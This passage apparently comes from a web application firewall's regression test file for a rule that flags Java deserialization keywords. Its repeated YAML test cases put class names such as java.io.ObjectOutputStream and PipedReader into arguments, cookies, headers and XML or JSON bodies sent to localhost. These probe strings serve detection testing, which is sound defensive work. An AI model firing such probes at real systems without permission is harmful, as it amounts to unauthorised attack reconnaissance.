Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.ObjectOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-186 desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.ObjectOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-187 desc: "Argument test includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.OutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-188 desc: "Argument name includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.OutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-189 desc: "Cookie test includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.OutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-190 desc: "Cookie name includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.OutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-191 desc: "Request header test includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.OutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-192 desc: "XML attribute value includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-193 desc: "XML element value includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.OutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-194 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.OutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-195 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.OutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-196 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.OutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-197 desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.OutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-198 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.PipedOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-199 desc: "Argument name includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.PipedOutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-200 desc: "Cookie test includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.PipedOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-201 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.PipedOutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-202 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.PipedOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-203 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-204 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PipedOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-205 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PipedOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-206 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.PipedOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-207 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.PipedOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-208 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.PipedOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-209 desc: "Argument test includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.PipedReader" output: log_contains: "id \"944130\"" - test_title: 944130-210 desc: "Argument name includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.PipedReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-211 desc: "Cookie test includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.PipedReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-212 desc: "Cookie name includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.PipedReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-213 desc: "Request header test includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.PipedReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-214 desc: "XML attribute value includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-215 desc: "XML element value includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PipedReader" output: log_contains: "id \"944130\"" - test_title: 944130-216 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PipedReader" output: log_contains: "id \"944130\"" - test_title: 944130-217 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.PipedReader" output: log_contains: "id \"944130\"" - test_title: 944130-218 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.PipedReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-219 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.PipedReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-220 desc: "Argument test includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.PrintStream" output: log_contains: "id \"944130\"" - test_title: 944130-221 desc: "Argument name includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.PrintStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-222 desc: "Cookie test includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.PrintStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-223 desc: "Cookie name includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.PrintStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-224 desc: "Request header test includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.PrintStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-225 desc: "XML attribute value includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-226 desc: "XML element value includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PrintStream" output: log_contains: "id \"944130\"" - test_title: 944130-227 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PrintStream" output: log_contains: "id \"944130\"" - test_title: 944130-228 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.PrintStream" output: log_contains: "id \"944130\"" - test_title: 944130-229 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.PrintStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-230 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.PrintStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-231 desc: "Argument test includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.PushbackInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-232 desc: "Argument name includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.PushbackInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-233 desc: "Cookie test includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.PushbackInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-234 desc: "Cookie name includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 